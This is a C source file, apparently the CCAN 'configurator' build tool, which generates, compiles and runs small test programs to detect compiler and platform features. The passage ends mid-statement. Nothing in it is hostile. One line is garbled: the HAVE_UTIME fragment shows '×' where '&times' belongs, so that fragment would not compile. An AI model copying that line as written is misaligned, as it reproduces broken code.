* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#define _POSIX_C_SOURCE 200809L /* For pclose, popen, strdup */
#define EXIT_BAD_USAGE 1
#define EXIT_TROUBLE_RUNNING 2
#define EXIT_BAD_TEST 3
#define EXIT_BAD_INPUT 4
#include <errno.h>
#include <stdio.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifdef _MSC_VER
#define popen _popen
#define pclose _pclose
#endif
#ifdef _MSC_VER
#define DEFAULT_COMPILER "cl"
/* Note: Dash options avoid POSIX path conversion when used under msys bash
* and are therefore preferred to slash (e.g. -nologo over /nologo)
* Note: Disable Warning 4200 "nonstandard extension used : zero-sized array
* in struct/union" for flexible array members.
*/
#define DEFAULT_FLAGS "-nologo -Zi -W4 -wd4200 " \
"-D_CRT_NONSTDC_NO_WARNINGS -D_CRT_SECURE_NO_WARNINGS"
#define DEFAULT_OUTPUT_EXE_FLAG "-Fe:"
#else
#define DEFAULT_COMPILER "cc"
#define DEFAULT_FLAGS "-g3 -ggdb -Wall -Wundef -Wmissing-prototypes -Wmissing-declarations -Wstrict-prototypes -Wold-style-definition"
#define DEFAULT_OUTPUT_EXE_FLAG "-o"
#endif
#define OUTPUT_FILE "configurator.out"
#define INPUT_FILE "configuratortest.c"
#ifdef _WIN32
#define DIR_SEP "\\"
#else
#define DIR_SEP "/"
#endif
static const char *progname = "";
static int verbose;
static bool like_a_libtool = false;
struct test {
const char *name;
const char *desc;
/*
* Template style flags (pick one):
* OUTSIDE_MAIN:
* - put a simple boilerplate main below it.
* DEFINES_FUNC:
* - defines a static function called func; adds ref to avoid warnings
* INSIDE_MAIN:
* - put this inside main().
* DEFINES_EVERYTHING:
* - don't add any boilerplate at all.
*
* Execution flags:
* EXECUTE:
* - a runtime test; must compile, exit 0 means flag is set.
* MAY_NOT_COMPILE:
* - Only useful with EXECUTE: don't get upset if it doesn't compile.
* <nothing>:
* - a compile test, if it compiles must run and exit 0.
*/
const char *style;
const char *depends;
const char *link;
const char *fragment;
const char *flags;
const char *overrides; /* On success, force this to '1' */
bool done;
bool answer;
};
/* Terminated by a NULL name */
static struct test *tests;
static const struct test base_tests[] = {
{ "HAVE_32BIT_OFF_T", "off_t is 32 bits",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE", NULL, NULL,
"#include <sys/types.h>\n"
"int main(void) {\n"
" return sizeof(off_t) == 4 ? 0 : 1;\n"
"}\n" },
{ "HAVE_ALIGNOF", "__alignof__ support",
"INSIDE_MAIN", NULL, NULL,
"return __alignof__(double) > 0 ? 0 : 1;" },
{ "HAVE_ASPRINTF", "asprintf() declaration",
"DEFINES_FUNC", NULL, NULL,
"#ifndef _GNU_SOURCE\n"
"#define _GNU_SOURCE\n"
"#endif\n"
"#include <stdio.h>\n"
"static char *func(int x) {"
" char *p;\n"
" if (asprintf(&p, \"%u\", x) == -1) \n"
" p = NULL;\n"
" return p;\n"
"}" },
{ "HAVE_ATTRIBUTE_COLD", "__attribute__((cold)) support",
"DEFINES_FUNC", NULL, NULL,
"static int __attribute__((cold)) func(int x) { return x; }" },
{ "HAVE_ATTRIBUTE_CONST", "__attribute__((const)) support",
"DEFINES_FUNC", NULL, NULL,
"static int __attribute__((const)) func(int x) { return x; }" },
{ "HAVE_ATTRIBUTE_DEPRECATED", "__attribute__((deprecated)) support",
"DEFINES_FUNC", NULL, NULL,
"static int __attribute__((deprecated)) func(int x) { return x; }" },
{ "HAVE_ATTRIBUTE_NONNULL", "__attribute__((nonnull)) support",
"DEFINES_FUNC", NULL, NULL,
"static char *__attribute__((nonnull)) func(char *p) { return p; }" },
{ "HAVE_ATTRIBUTE_SENTINEL", "__attribute__((sentinel)) support",
"DEFINES_FUNC", NULL, NULL,
"static int __attribute__((sentinel)) func(int i, ...) { return i; }" },
{ "HAVE_ATTRIBUTE_PURE", "__attribute__((pure)) support",
"DEFINES_FUNC", NULL, NULL,
"static int __attribute__((pure)) func(int x) { return x; }" },
{ "HAVE_ATTRIBUTE_MAY_ALIAS", "__attribute__((may_alias)) support",
"OUTSIDE_MAIN", NULL, NULL,
"typedef short __attribute__((__may_alias__)) short_a;" },
{ "HAVE_ATTRIBUTE_NORETURN", "__attribute__((noreturn)) support",
"DEFINES_FUNC", NULL, NULL,
"#include <stdlib.h>\n"
"static void __attribute__((noreturn)) func(int x) { exit(x); }" },
{ "HAVE_ATTRIBUTE_PRINTF", "__attribute__ format printf support",
"DEFINES_FUNC", NULL, NULL,
"static void __attribute__((format(__printf__, 1, 2))) func(const char *fmt, ...) { (void)fmt; }" },
{ "HAVE_ATTRIBUTE_UNUSED", "__attribute__((unused)) support",
"OUTSIDE_MAIN", NULL, NULL,
"static int __attribute__((unused)) func(int x) { return x; }" },
{ "HAVE_ATTRIBUTE_USED", "__attribute__((used)) support",
"OUTSIDE_MAIN", NULL, NULL,
"static int __attribute__((used)) func(int x) { return x; }" },
{ "HAVE_BACKTRACE", "backtrace() in <execinfo.h>",
"DEFINES_FUNC", NULL, NULL,
"#include <execinfo.h>\n"
"static int func(int x) {"
" void *bt[10];\n"
" return backtrace(bt, 10) < x;\n"
"}" },
{ "HAVE_BIG_ENDIAN", "big endian",
"INSIDE_MAIN|EXECUTE", NULL, NULL,
"union { int i; char c[sizeof(int)]; } u;\n"
"u.i = 0x01020304;\n"
"return u.c[0] == 0x01 && u.c[1] == 0x02 && u.c[2] == 0x03 && u.c[3] == 0x04 ? 0 : 1;" },
{ "HAVE_BSWAP_64", "bswap64 in byteswap.h",
"DEFINES_FUNC", "HAVE_BYTESWAP_H", NULL,
"#include <byteswap.h>\n"
"static int func(int x) { return bswap_64(x); }" },
{ "HAVE_BUILTIN_CHOOSE_EXPR", "__builtin_choose_expr support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_choose_expr(1, 0, \"garbage\");" },
{ "HAVE_BUILTIN_CLZ", "__builtin_clz support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_clz(1) == (sizeof(int)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CLZL", "__builtin_clzl support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_clzl(1) == (sizeof(long)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CLZLL", "__builtin_clzll support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_clzll(1) == (sizeof(long long)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CTZ", "__builtin_ctz support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ctz(1 << (sizeof(int)*8 - 1)) == (sizeof(int)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CTZL", "__builtin_ctzl support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ctzl(1UL << (sizeof(long)*8 - 1)) == (sizeof(long)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CTZLL", "__builtin_ctzll support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ctzll(1ULL << (sizeof(long long)*8 - 1)) == (sizeof(long long)*8 - 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_CONSTANT_P", "__builtin_constant_p support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_constant_p(1) ? 0 : 1;" },
{ "HAVE_BUILTIN_EXPECT", "__builtin_expect support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_expect(argc == 1, 1) ? 0 : 1;" },
{ "HAVE_BUILTIN_FFS", "__builtin_ffs support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ffs(0) == 0 ? 0 : 1;" },
{ "HAVE_BUILTIN_FFSL", "__builtin_ffsl support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ffsl(0L) == 0 ? 0 : 1;" },
{ "HAVE_BUILTIN_FFSLL", "__builtin_ffsll support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_ffsll(0LL) == 0 ? 0 : 1;" },
{ "HAVE_BUILTIN_POPCOUNT", "__builtin_popcount support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_popcount(255) == 8 ? 0 : 1;" },
{ "HAVE_BUILTIN_POPCOUNTL", "__builtin_popcountl support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_popcountl(255L) == 8 ? 0 : 1;" },
{ "HAVE_BUILTIN_POPCOUNTLL", "__builtin_popcountll support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_popcountll(255LL) == 8 ? 0 : 1;" },
{ "HAVE_BUILTIN_TYPES_COMPATIBLE_P", "__builtin_types_compatible_p support",
"INSIDE_MAIN", NULL, NULL,
"return __builtin_types_compatible_p(char *, int) ? 1 : 0;" },
{ "HAVE_ICCARM_INTRINSICS", "<intrinsics.h>",
"DEFINES_FUNC", NULL, NULL,
"#include <intrinsics.h>\n"
"int func(int v) {\n"
" return __CLZ(__RBIT(v));\n"
"}" },
{ "HAVE_BYTESWAP_H", "<byteswap.h>",
"OUTSIDE_MAIN", NULL, NULL,
"#include <byteswap.h>\n" },
{ "HAVE_CLOCK_GETTIME", "clock_gettime() declaration",
"DEFINES_FUNC", "HAVE_STRUCT_TIMESPEC", NULL,
"#include <time.h>\n"
"static struct timespec func(void) {\n"
" struct timespec ts;\n"
" clock_gettime(CLOCK_REALTIME, &ts);\n"
" return ts;\n"
"}\n" },
{ "HAVE_CLOCK_GETTIME_IN_LIBRT", "clock_gettime() in librt",
"DEFINES_FUNC",
"HAVE_STRUCT_TIMESPEC !HAVE_CLOCK_GETTIME",
"-lrt",
"#include <time.h>\n"
"static struct timespec func(void) {\n"
" struct timespec ts;\n"
" clock_gettime(CLOCK_REALTIME, &ts);\n"
" return ts;\n"
"}\n",
/* This means HAVE_CLOCK_GETTIME, too */
"HAVE_CLOCK_GETTIME" },
{ "HAVE_COMPOUND_LITERALS", "compound literal support",
"INSIDE_MAIN", NULL, NULL,
"int *foo = (int[]) { 1, 2, 3, 4 };\n"
"return foo[0] ? 0 : 1;" },
{ "HAVE_FCHDIR", "fchdir support",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE", NULL, NULL,
"#include <sys/types.h>\n"
"#include <sys/stat.h>\n"
"#include <fcntl.h>\n"
"#include <unistd.h>\n"
"int main(void) {\n"
" int fd = open(\"..\", O_RDONLY);\n"
" return fchdir(fd) == 0 ? 0 : 1;\n"
"}\n" },
{ "HAVE_ERR_H", "<err.h>",
"DEFINES_FUNC", NULL, NULL,
"#include <err.h>\n"
"static void func(int arg) {\n"
" if (arg == 0)\n"
" err(1, \"err %u\", arg);\n"
" if (arg == 1)\n"
" errx(1, \"err %u\", arg);\n"
" if (arg == 3)\n"
" warn(\"warn %u\", arg);\n"
" if (arg == 4)\n"
" warnx(\"warn %u\", arg);\n"
"}\n" },
{ "HAVE_FILE_OFFSET_BITS", "_FILE_OFFSET_BITS to get 64-bit offsets",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE",
"HAVE_32BIT_OFF_T", NULL,
"#define _FILE_OFFSET_BITS 64\n"
"#include <sys/types.h>\n"
"int main(void) {\n"
" return sizeof(off_t) == 8 ? 0 : 1;\n"
"}\n" },
{ "HAVE_FOR_LOOP_DECLARATION", "for loop declaration support",
"INSIDE_MAIN", NULL, NULL,
"int ret = 1;\n"
"for (int i = 0; i < argc; i++) { ret = 0; };\n"
"return ret;" },
{ "HAVE_FLEXIBLE_ARRAY_MEMBER", "flexible array member support",
"OUTSIDE_MAIN", NULL, NULL,
"struct foo { unsigned int x; int arr[]; };" },
{ "HAVE_GETPAGESIZE", "getpagesize() in <unistd.h>",
"DEFINES_FUNC", NULL, NULL,
"#include <unistd.h>\n"
"static int func(void) { return getpagesize(); }" },
{ "HAVE_ISBLANK", "isblank() in <ctype.h>",
"DEFINES_FUNC", NULL, NULL,
"#ifndef _GNU_SOURCE\n"
"#define _GNU_SOURCE\n"
"#endif\n"
"#include <ctype.h>\n"
"static int func(void) { return isblank(' '); }" },
{ "HAVE_LITTLE_ENDIAN", "little endian",
"INSIDE_MAIN|EXECUTE", NULL, NULL,
"union { int i; char c[sizeof(int)]; } u;\n"
"u.i = 0x01020304;\n"
"return u.c[0] == 0x04 && u.c[1] == 0x03 && u.c[2] == 0x02 && u.c[3] == 0x01 ? 0 : 1;" },
{ "HAVE_MEMMEM", "memmem in <string.h>",
"DEFINES_FUNC", NULL, NULL,
"#ifndef _GNU_SOURCE\n"
"#define _GNU_SOURCE\n"
"#endif\n"
"#include <string.h>\n"
"static void *func(void *h, size_t hl, void *n, size_t nl) {\n"
"return memmem(h, hl, n, nl);"
"}\n", },
{ "HAVE_MEMRCHR", "memrchr in <string.h>",
"DEFINES_FUNC", NULL, NULL,
"#ifndef _GNU_SOURCE\n"
"#define _GNU_SOURCE\n"
"#endif\n"
"#include <string.h>\n"
"static void *func(void *s, int c, size_t n) {\n"
"return memrchr(s, c, n);"
"}\n", },
{ "HAVE_MMAP", "mmap() declaration",
"DEFINES_FUNC", NULL, NULL,
"#include <sys/mman.h>\n"
"static void *func(int fd) {\n"
" return mmap(0, 65536, PROT_READ, MAP_SHARED, fd, 0);\n"
"}" },
{ "HAVE_PROC_SELF_MAPS", "/proc/self/maps exists",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE", NULL, NULL,
"#include <sys/types.h>\n"
"#include <sys/stat.h>\n"
"#include <fcntl.h>\n"
"int main(void) {\n"
" return open(\"/proc/self/maps\", O_RDONLY) != -1 ? 0 : 1;\n"
"}\n" },
{ "HAVE_QSORT_R_PRIVATE_LAST", "qsort_r cmp takes trailing arg",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE", NULL, NULL,
"#ifndef _GNU_SOURCE\n"
"#define _GNU_SOURCE\n"
"#endif\n"
"#include <stdlib.h>\n"
"static int cmp(const void *lp, const void *rp, void *priv) {\n"
" *(unsigned int *)priv = 1;\n"
" return *(const int *)lp - *(const int *)rp; }\n"
"int main(void) {\n"
" int array[] = { 9, 2, 5 };\n"
" unsigned int called = 0;\n"
" qsort_r(array, 3, sizeof(int), cmp, &called);\n"
" return called && array[0] == 2 && array[1] == 5 && array[2] == 9 ? 0 : 1;\n"
"}\n" },
{ "HAVE_STRUCT_TIMESPEC", "struct timespec declaration",
"DEFINES_FUNC", NULL, NULL,
"#include <time.h>\n"
"static void func(void) {\n"
" struct timespec ts;\n"
" ts.tv_sec = ts.tv_nsec = 1;\n"
"}\n" },
{ "HAVE_SECTION_START_STOP", "__attribute__((section)) and __start/__stop",
"DEFINES_FUNC", NULL, NULL,
"static void *__attribute__((__section__(\"mysec\"))) p = &p;\n"
"static int func(void) {\n"
" extern void *__start_mysec[], *__stop_mysec[];\n"
" return __stop_mysec - __start_mysec;\n"
"}\n" },
{ "HAVE_STACK_GROWS_UPWARDS", "stack grows upwards",
"DEFINES_EVERYTHING|EXECUTE", NULL, NULL,
"#include <stddef.h>\n"
"static ptrdiff_t nest(const void *base, unsigned int i)\n"
"{\n"
" if (i == 0)\n"
" return (const char *)&i - (const char *)base;\n"
" return nest(base, i-1);\n"
"}\n"
"int main(int argc, char *argv[]) {\n"
" (void)argv;\n"
" return (nest(&argc, argc) > 0) ? 0 : 1;\n"
"}\n" },
{ "HAVE_STATEMENT_EXPR", "statement expression support",
"INSIDE_MAIN", NULL, NULL,
"return ({ int x = argc; x == argc ? 0 : 1; });" },
{ "HAVE_SYS_FILIO_H", "<sys/filio.h>",
"OUTSIDE_MAIN", NULL, NULL, /* Solaris needs this for FIONREAD */
"#include <sys/filio.h>\n" },
{ "HAVE_SYS_TERMIOS_H", "<sys/termios.h>",
"OUTSIDE_MAIN", NULL, NULL,
"#include <sys/termios.h>\n" },
{ "HAVE_SYS_UNISTD_H", "<sys/unistd.h>",
"OUTSIDE_MAIN", NULL, NULL,
"#include <sys/unistd.h>\n" },
{ "HAVE_TYPEOF", "__typeof__ support",
"INSIDE_MAIN", NULL, NULL,
"__typeof__(argc) i; i = argc; return i == argc ? 0 : 1;" },
{ "HAVE_UNALIGNED_ACCESS", "unaligned access to int",
"DEFINES_EVERYTHING|EXECUTE", NULL, NULL,
"#include <string.h>\n"
"int main(int argc, char *argv[]) {\n"
" (void)argc;\n"
" char pad[sizeof(int *) * 1];\n"
" strncpy(pad, argv[0], sizeof(pad));\n"
" int *x = (int *)pad, *y = (int *)(pad + 1);\n"
" return *x == *y;\n"
"}\n" },
{ "HAVE_UTIME", "utime() declaration",
"DEFINES_FUNC", NULL, NULL,
"#include <sys/types.h>\n"
"#include <utime.h>\n"
"static int func(const char *filename) {\n"
" struct utimbuf times = { 0 };\n"
" return utime(filename, ×);\n"
"}" },
{ "HAVE_WARN_UNUSED_RESULT", "__attribute__((warn_unused_result))",
"DEFINES_FUNC", NULL, NULL,
"#include <sys/types.h>\n"
"#include <utime.h>\n"
"static __attribute__((warn_unused_result)) int func(int i) {\n"
" return i + 1;\n"
"}" },
{ "HAVE_OPENMP", "#pragma omp and -fopenmp support",
"INSIDE_MAIN", NULL, NULL,
"int i;\n"
"#pragma omp parallel for\n"
"for(i = 0; i < 0; i++) {};\n"
"return 0;\n",
"-Werror -fopenmp" },
{ "HAVE_VALGRIND_MEMCHECK_H", "<valgrind/memcheck.h>",
"OUTSIDE_MAIN", NULL, NULL,
"#include <valgrind/memcheck.h>\n" },
{ "HAVE_UCONTEXT", "working <ucontext.h",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE",
NULL, NULL,
"#include <ucontext.h>\n"
"static int x = 0;\n"
"static char stack[2048];\n"
"static ucontext_t a, b;\n"
"static void fn(void) {\n"
" x |= 2;\n"
" setcontext(&b);\n"
" x |= 4;\n"
"}\n"
"int main(void) {\n"
" x |= 1;\n"
" getcontext(&a);\n"
" a.uc_stack.ss_sp = stack;\n"
" a.uc_stack.ss_size = sizeof(stack);\n"
" makecontext(&a, fn, 0);\n"
" swapcontext(&b, &a);\n"
" return (x == 3) ? 0 : 1;\n"
"}\n"
},
{ "HAVE_POINTER_SAFE_MAKECONTEXT", "passing pointers via makecontext()",
"DEFINES_EVERYTHING|EXECUTE|MAY_NOT_COMPILE",
"HAVE_UCONTEXT", NULL,
"#include <stddef.h>\n"
"#include <ucontext.h>\n"
"static int worked = 0;\n"
"static char stack[1024];\n"
"static ucontext_t a, b;\n"
"static void fn(void *p, void *q) {\n"
" void *cp = &worked;\n"
" void *cq = (void *)(~((ptrdiff_t)cp));\n"
" if ((p == cp) && (q == cq))\n"
" worked = 1;\n"
" setcontext(&b);\n"
"}\n"
"int main(void) {\n"
" void *ap = &worked;\n"
" void *aq = (void *)(~((ptrdiff_t)ap));\n"
" getcontext(&a);\n"
" a.uc_stack.ss_sp = stack;\n"
" a.uc_stack.ss_size = sizeof(stack);\n"
" makecontext(&a, (void (*)(void))fn, 2, ap, aq);\n"
" swapcontext(&b, &a);\n"
" return worked ? 0 : 1;\n"
"}\n"
},
{ "HAVE_BUILTIN_CPU_SUPPORTS", "__builtin_cpu_supports()",
"DEFINES_FUNC", NULL, NULL,
"#include <stdbool.h>\n"
"static bool func(void) {\n"
" return __builtin_cpu_supports(\"mmx\");\n"
"}"
},
};
static void c12r_err(int eval, const char *fmt, ...)
{
int err_errno = errno;
va_list ap;
fprintf(stderr, "%s: ", progname);
va_start(ap, fmt);
vfprintf(stderr, fmt, ap);
va_end(ap);
fprintf(stderr, ": %s\n", strerror(err_errno));
exit(eval);
}
static void c12r_errx(int eval, const char *fmt, ...)
{
va_list ap;
fprintf(stderr, "%s: ", progname);
va_start(ap, fmt);
vfprintf(stderr, fmt, ap);
va_end(ap);
fprintf(stderr, "\n");
exit(eval);
}
static void start_test(const char *what, const char *why)
{
if (like_a_libtool) {
printf("%s%s... ", what, why);
fflush(stdout);
}
}
static void end_test(bool result)
{
if (like_a_libtool)
printf("%s\n", result ? "yes" : "no");
}
static size_t fcopy(FILE *fsrc, FILE *fdst)
{
char buffer[BUFSIZ];
size_t rsize, wsize;
size_t copied = 0;
while ((rsize = fread(buffer, 1, BUFSIZ, fsrc)) > 0) {
wsize = fwrite(buffer, 1, rsize, fdst);
copied += wsize;
if (wsize != rsize)
break;
}
return copied;
}
static char *grab_stream(FILE *file)
{
size_t max, ret, size = 0;
char *buffer;
max = BUFSIZ;
buffer = malloc(max);
while ((ret = fread(buffer+size, 1, max - size, file)) == max - size) {
size += ret;
buffer = realloc(buffer, max *= 2);
}
size += ret;
if (ferror(file))
c12r_err(EXIT_TROUBLE_RUNNING, "reading from command");
buffer[size] = '\0';
return buffer;
}
static char *run(const char *cmd, int *exitstatus)
{
static const char redir[] = " 2>&1";
size_t cmdlen;
char *cmdredir;
FILE *cmdout;
char *ret;
cmdlen = strlen(cmd);
cmdredir = malloc(cmdlen + sizeof(redir));
memcpy(cmdredir, cmd, cmdlen);
memcpy(cmdredir + cmdlen, redir, sizeof(redir));
cmdout = popen(cmdredir, "r");
if (!cmdout)
c12r_err(EXIT_TROUBLE_RUNNING, "popen \"%s\"", cmdredir);
free(cmdredir);
ret = grab_stream(cmdout);
*exitstatus = pclose(cmdout);
return ret;
}
static char *connect_args(const char *argv[], const char *outflag,
const char *files)
{
unsigned int i;
char *ret;
size_t len = strlen(outflag) + strlen(files) + 1;
for (i = 1; argv[i]; i++)
len += 1 + strlen(argv[i]);
ret = malloc(len);
len = 0;
for (i = 1; argv[i]; i++) {
strcpy(ret + len, argv[i]);
len += strlen(argv[i]);
if (argv[i+1] || *outflag)
ret[len++] = ' ';
}
strcpy(ret + len, outflag);
len += strlen(outflag);
strcpy(ret + len, files);
return ret;
}
static struct test *find_test(const char *name)
{
unsigned int i;
for (i = 0; tests[i].name; i++) {
if (strcmp(tests[i].name, name) == 0)
return &tests[i];
}
c12r_errx(EXIT_BAD_TEST, "Unknown test %s", name);
abort();
}
#define PRE_BOILERPLATE "/* Test program generated by configurator. */\n"
#define MAIN_START_BOILERPLATE \
"int main(int argc, char *argv[]) {\n" \
" (void)argc;\n" \
" (void)argv;\n"
#define USE_FUNC_BOILERPLATE "(void)func;\n"
#define MAIN_BODY_BOILERPLATE "return 0;\n"
#define MAIN_END_BOILERPLATE "}\n"
static bool run_test(const char *cmd, struct test *test)
{
char *output, *newcmd;
FILE *outf;
int status;
if (test->done)
return test->answer;
if (test->depends) {
size_t len;
const char *deps = test->depends;
char *dep;
/* Space-separated dependencies; a leading ! inverts one. */
while ((len = strcspn(deps, " ")) != 0) {
	bool positive = true;
	const char *dep_name;
	if (deps[len]) {
		dep = strdup(deps);
		dep[len] = '\0';
	} else {
		dep = (char *)deps;
	}
	dep_name = dep;
	if (dep_name[0] == '!') {
		dep_name++;
		positive = false;
	}
	if (run_test(cmd, find_test(dep_name)) != positive) {
		if (deps[len])
			free(dep);
		test->answer = false;
		test->done = true;
		return test->answer;
	}
	/* Free the strdup'ed copy via its original pointer;
	 * dep_name may have been advanced past the '!'. */
	if (deps[len])
		free(dep);
	deps += len;
	deps += strspn(deps, " ");
}
}
outf = fopen(INPUT_FILE, verbose > 1 ? "w+" : "w");
if (!outf)
c12r_err(EXIT_TROUBLE_RUNNING, "creating %s", INPUT_FILE);
fprintf(outf, "%s", PRE_BOILERPLATE);
if (strstr(test->style, "INSIDE_MAIN")) {
fprintf(outf, "%s", MAIN_START_BOILERPLATE);
fprintf(outf, "%s", test->fragment);
fprintf(outf, "%s", MAIN_END_BOILERPLATE);
} else if (strstr(test->style, "OUTSIDE_MAIN")) {
fprintf(outf, "%s", test->fragment);
fprintf(outf, "%s", MAIN_START_BOILERPLATE);
fprintf(outf, "%s", MAIN_BODY_BOILERPLATE);
fprintf(outf, "%s", MAIN_END_BOILERPLATE);
} else if (strstr(test->style, "DEFINES_FUNC")) {
fprintf(outf, "%s", test->fragment);
fprintf(outf, "%s", MAIN_START_BOILERPLATE);
fprintf(outf, "%s", USE_FUNC_BOILERPLATE);
fprintf(outf, "%s", MAIN_BODY_BOILERPLATE);
fprintf(outf, "%s", MAIN_END_BOILERPLATE);
} else if (strstr(test->style, "DEFINES_EVERYTHING")) {
fprintf(outf, "%s", test->fragment);
} else
c12r_errx(EXIT_BAD_TEST, "Unknown style for test %s: %s",
test->name, test->style);
if (verbose > 1) {
fseek(outf, 0, SEEK_SET);
fcopy(outf, stdout);
}
fclose(outf);
newcmd = strdup(cmd);
if (test->flags) {
newcmd = realloc(newcmd, strlen(newcmd) + strlen(" ")
+ strlen(test->flags) + 1);
strcat(newcmd, " ");
strcat(newcmd, test->flags);
if (verbose > 1)
printf("Extra flags line: %s", newcmd);
}
if (test->link) {
newcmd = realloc(newcmd, strlen(newcmd) + strlen(" ")
+ strlen(test->link) + 1);
strcat(newcmd, " ");
strcat(newcmd, test->link);
if (verbose > 1)
printf("Extra link line: %s", newcmd);
}
start_test("checking for ", test->desc);
output = run(newcmd, &status);
free(newcmd);
if (status != 0 || strstr(output, "warning")) {
if (verbose)
printf("Compile %s for %s, status %i: %s\n",
status ? "fail" : "warning",
test->name, status, output);
if (strstr(test->style, "EXECUTE")
&& !strstr(test->style, "MAY_NOT_COMPILE"))
c12r_errx(EXIT_BAD_TEST,
"Test for %s did not compile:\n%s",
test->name, output);
test->answer = false;
free(output);
} else {
/* Compile succeeded. */
free(output);
/* We run INSIDE_MAIN tests for sanity checking. */
if (strstr(test->style, "EXECUTE")
|| strstr(test->style, "INSIDE_MAIN")) {
output = run("." DIR_SEP OUTPUT_FILE, &status);
if (!strstr(test->style, "EXECUTE") && status != 0)
c12r_errx(EXIT_BAD_TEST,
"Test for %s failed with %i:\n%s",
test->name, status, output);
if (verbose && status)
printf("%s exited %i\n", test->name, status);
free(output);
}
test->answer = (status == 0);
}
test->done = true;
end_test(test->answer);
if (test->answer && test->overrides) {
struct test *override = find_test(test->overrides);
override->done = true;
override->answer = true;
}
return test->answer;
}
static char *any_field(char **fieldname)
{
char buf[1000];
for (;;) {
char *p, *eq;
if (!fgets(buf, sizeof(buf), stdin))
return NULL;
p = buf;
/* Ignore whitespace, lines starting with # */
while (*p == ' ' || *p == '\t')
p++;
if (*p == '#' || *p == '\n')
continue;
eq = strchr(p, '=');
if (!eq)
c12r_errx(EXIT_BAD_INPUT, "no = in line: %s", p);
*eq = '\0';
*fieldname = strdup(p);
p = eq + 1;
if (strlen(p) && p[strlen(p)-1] == '\n')
p[strlen(p)-1] = '\0';
return strdup(p);
}
}
static char *read_field(const char *name, bool compulsory)
{
char *fieldname, *value;
value = any_field(&fieldname);
if (!value) {
if (!compulsory)
return NULL;
c12r_errx(EXIT_BAD_INPUT, "Could not read field %s", name);
}
if (strcmp(fieldname, name) != 0)
c12r_errx(EXIT_BAD_INPUT,
"Expected field %s not %s", name, fieldname);
return value;
}
/* Test descriptions from stdin:
* Lines starting with # or whitespace-only are ignored.
*
* First three non-ignored lines must be:
* var=<varname>
* desc=<description-for-autotools-style>
* style=OUTSIDE_MAIN DEFINES_FUNC INSIDE_MAIN DEFINES_EVERYTHING EXECUTE MAY_NOT_COMPILE
*
* Followed by optional lines:
* depends=<space-separated-testnames, ! to invert>
* link=<extra args for link line>
* flags=<extra args for compile line>
* overrides=<testname-to-force>
*
* Finally a code line, either:
* code=<oneline> OR
* code=
* <lines of code>
* <end-comment>
*
* And <end-comment> looks like this next comment: */
/*END*/
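/* For illustration only (a made-up entry, not from the shipped test list),
 * a test in the format above could look like:
 *   var=HAVE_STATEMENT_EXPR
 *   desc=statement expressions
 *   style=INSIDE_MAIN
 *   code=return ({ int x = 0; x; });
 * read_test() below parses exactly this shape. */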
static bool read_test(struct test *test)
{
char *field, *value;
char buf[1000];
memset(test, 0, sizeof(*test));
test->name = read_field("var", false);
if (!test->name)
return false;
test->desc = read_field("desc", true);
test->style = read_field("style", true);
/* Read any optional fields. */
while ((value = any_field(&field)) != NULL) {
if (strcmp(field, "depends") == 0)
test->depends = value;
else if (strcmp(field, "link") == 0)
test->link = value;
else if (strcmp(field, "flags") == 0)
test->flags = value;
else if (strcmp(field, "overrides") == 0)
test->overrides = value;
else if (strcmp(field, "code") == 0)
break;
else
c12r_errx(EXIT_BAD_INPUT, "Unknown field %s in %s",
field, test->name);
}
if (!value)
c12r_errx(EXIT_BAD_INPUT, "Missing code in %s", test->name);
if (strlen(value) == 0) {
/* Multiline program, read to END comment */
while (fgets(buf, sizeof(buf), stdin) != 0) {
size_t n;
if (strncmp(buf, "/*END*/", 7) == 0)
break;
			n = strlen(value);
			value = realloc(value, n + strlen(buf) + 1);
			strcpy(value + n, buf);
}
}
test->fragment = value;
return true;
}
static void read_tests(size_t num_tests)
{
while (read_test(tests + num_tests)) {
num_tests++;
tests = realloc(tests, (num_tests + 1) * sizeof(tests[0]));
tests[num_tests].name = NULL;
}
}
int main(int argc, const char *argv[])
{
char *cmd;
unsigned int i;
const char *default_args[]
= { "", DEFAULT_COMPILER, DEFAULT_FLAGS, NULL };
const char *outflag = DEFAULT_OUTPUT_EXE_FLAG;
const char *configurator_cc = NULL;
const char *orig_cc;
const char *varfile = NULL;
const char *headerfile = NULL;
bool extra_tests = false;
FILE *outf;
if (argc > 0)
progname = argv[0];
while (argc > 1) {
if (strcmp(argv[1], "--help") == 0) {
printf("Usage: configurator [-v] [--var-file=<filename>] [-O<outflag>] [--configurator-cc=<compiler-for-tests>] [--autotools-style] [--extra-tests] [<compiler> <flags>...]\n"
